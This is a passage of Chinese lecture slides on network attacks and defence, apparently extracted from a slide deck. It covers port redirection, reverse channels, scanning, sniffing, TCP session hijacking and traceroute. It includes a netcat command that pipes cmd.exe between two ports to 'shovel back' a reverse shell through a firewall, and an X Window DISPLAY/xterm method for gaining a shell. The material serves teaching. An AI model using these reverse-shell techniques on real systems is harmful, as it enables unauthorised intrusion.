51、些障碍可能利用端口重定向技术绕过这些障碍。 89 (1)端口重定向 端口重定向是将TCP连接从一个套接口重定向到另一个套接口. 黑客使用端口重定向来完成受防火墙阻挡的TCP连接,他们利用 一个系统可拥有多个端口的特点,使系统担当使系统担当IPIP分组的转发功能分组的转发功能, 即可从系统的一个端口输入,从同一系统的另一端口输出,使本来 受阻的TCP连接能够在新的路径上重获TCP连接.这使得攻击者使得攻击者 只要在侵害了一个目标系统后只要在侵害了一个目标系统后, ,就能访问防火墙后的任意目标就能访问防火墙后的任意目标。 90 (2)反向远程登录和反向通道 DMZ网段 (非军事区) 边界 路由器

52、代理器 内部 路由器 门 外楔 内楔 一个完整的防火墙 外部 网段 内部 网段 子网 1子网 2 攻击者 系统 远程登录 TCP连接受阻 目标 系统 防火墙关掉远程登录服务，也就是关闭25号端口输入 DMZ网段 边界 路由器 代理器 内部 路由器 门 外楔 内楔 一个完整的防火墙 外部 网段 内部 网段 子网1子网2 攻击者 系统 目标 系统 防火墙关掉远程登录服务， 也就是关闭从25号端口输入的连接 80号端口输入 25号端口输出 反向远程登录和反向通道原理图 80号端口是HTTP 防火墙关闭远程登录服务，远程登录TCP连接受阻 91 (3)使用netcat 实现远程命令“铲回” DMZ网段

53、 边界 路由器 代理器 内部 路由器 门 外楔 内楔 一个完整的防火墙 外部 网段 内部 网段 子网1子网2 攻击者 系统 目标 系统 防火墙关掉远程登录服务， 也就是关闭从25号端口输入的连接 25号端口输出 80号端口输入 如果攻击方和目标系统上均可使用netcat，它使目标系统上的 shell受控于攻击系统。假设下面的命令运行在目标机器的远处命 令提示符下：nc 80 | cmd.exe | nc 25 如果目标机器()正在用netcat侦听80号和25号TCP 端口，而TCP80号端口允许受害机器得到通过防火墙进入的数据， 而TCP25号端口允许受害机器通过防火墙输出数据，那么此命令

54、就可以从受害机器上“铲回”远程命令shell。 92 控制X Window系统 如果远程登录服务被关掉或被防火墙阻塞住了， 黑客也可以通过控制X Window系统获取对目标系 统的shell的访问权，叙述如下。 X是允许多个程序共用同一个图形显示器的窗口 化机制。机制相当鲁棒，允许基于X的客户程序 显示到远程计算机上执行的X服务器(运行在 60006063端口)上。对于攻击者来说，最有用的 客户程序之一是xterm。黑客首先需要得到目标服 务器的使用权。为了在他自己的服务器上设置显 示，执行下列命令： export DISPLAY=84:0.0 然后执行xterm命令。因

55、此，他能在自己的服务器 上得到xterm 应用程序图形用户界面。 93 8.3.3 TCP连接规程与端口扫描 客户服务器 (1)客户发出SYN (2)服务器发回SYN/ACK (3)客户再发出ACK TCP连接的三次握手过程 (1)TCP连接扫描 (2)TCP同步扫描 (3) UDP扫描: 此种技术是往目标端口发送一个UDP分组。 如果目标端口是以一个“ICMP 端口不可达” 消息来作为响应，那么说明该 端口是关闭的；相反，如果没有收到这个消息那就可以推断该端口是打开着。 TCP连接扫描是调用套接口函数连接到目标 端口上。图示出传输控制连接的三次路握手 过程. TCP同步扫描也称为“半打开扫描

56、，因为并 没有建立完整的TCP连接，这种技术的优势 是比完整的TCP连接更隐秘，而且目标系统 可能不登记它。它很容易被目标系统检测到。 94 UDP/TCP主要应用的已知端口号 端 口 号 UDP应用 端口 号 TCP应用 7 9 53 61 68 69 161 162 返回(echo)服务器 丢弃(discard)服务器 域名(DNS)服务器 动态主机配置协议(DHCP)服务器 动态主机配置协议(DHCP) 客户 简单文件传送协议(TFTP) 简单网络管理协议(SNMP)数据 简单网络管理协议(SNMP)控制信息 20 21 23 25 53 80 110 111 119 文件传送协议(FT

57、P)数据 文件传送协议(FTP)控制信息 远程登录(TELNET) 简单邮件传送协议(SMTP) 域名系统(DNS) 超文本传送协议(HTTP) 主站(HOST office)协议 远程呼叫(RPC) 网络新闻传送协议(NNTP) 95 8.3.4 TCP数据传输与TCP会话劫持 网卡一旦处于随意模式网卡一旦处于随意模式,嗅探程序软件就能捕获并分析本地以太网段上流动的任嗅探程序软件就能捕获并分析本地以太网段上流动的任 何分组何分组.如果攻击者使用的网络设备处于与网络运行中心之间的某个共享网络媒如果攻击者使用的网络设备处于与网络运行中心之间的某个共享网络媒 体上，那么他们能够窥探这个链路上发生的

58、所有连接，并盗用其中的体上，那么他们能够窥探这个链路上发生的所有连接，并盗用其中的telnet会话会话 或或Cisco路由器上的路由器上的enable密码密码,还能提交有待在远程系统上执行的命令还能提交有待在远程系统上执行的命令 96 TCP的分组格式 版 本 业 务 量 类 型流 标 记 净 荷 长 度下 一 个 头 标 ： 6中 继 点 限 制 信 源 地 址 目 的 地 址 源 端 口目 的 端 口 序 列 号 接 收 确 认 号 窗 口 号 紧 急 指 针校 验 和 偏 移控 制 域保 留 应 用 数 据 TCP选 项 IP头 标 TCP头 标 控制域 名 各个比特的意义 URG AC

59、K PSH RST SYN FIN 紧急指针域有意义 接收确认号域有意 义 启动了PUSH功能 对连接复位 对序列号同步 结束使用的连接 TCP控制域各个比特的意义 97 8.4基于TCP与ICMP分组组合的 网络攻击和防御 8.4.1 网络的路径跟踪原理 8.4.2 分布式拒绝服务攻击 98 利用IP中继点数限制查询最近的服务器 限 制 =1 路 由 器 1 路 由 器 2 PC机 路 由 器 4 路 由 器 5 路 由 器 6 路 由 器 7 服 务 器 1 服 务 器 2 服 务 器 3 路 由 器 8服 务 器 4 限 制 =2限 制 =3限 制 =4限 制 =5 路 由 器 3 首先，PC机将中继点数限制的初值设置为1并发送查询信息(这里查询服 务器)，此最初的查询信息到达两个路由器(12)虽未被抛弃，但任何一 个路由器都没有提供所需的服务。PC机启动定时器等待应答，定时器超 时后重发查询信息。然后将中继点数限制的初值设置为2，结果搜索范围 扩大到四个路由器(1，2，3，4)，但在此范围内还是没有服务器。在下 一个超时后，PC机再次进行查询，这次将中继点数限制的初值设置为3。 此次查询到服务器1。此服务器对请求作出应答，PC机结束搜索。不再 访问第4个中继点和第5个中继点上的其他服务器。 99 路径跟踪程序工作原理 (1)路径跟踪程序如何探测出除最后一跳外的其余各跳路径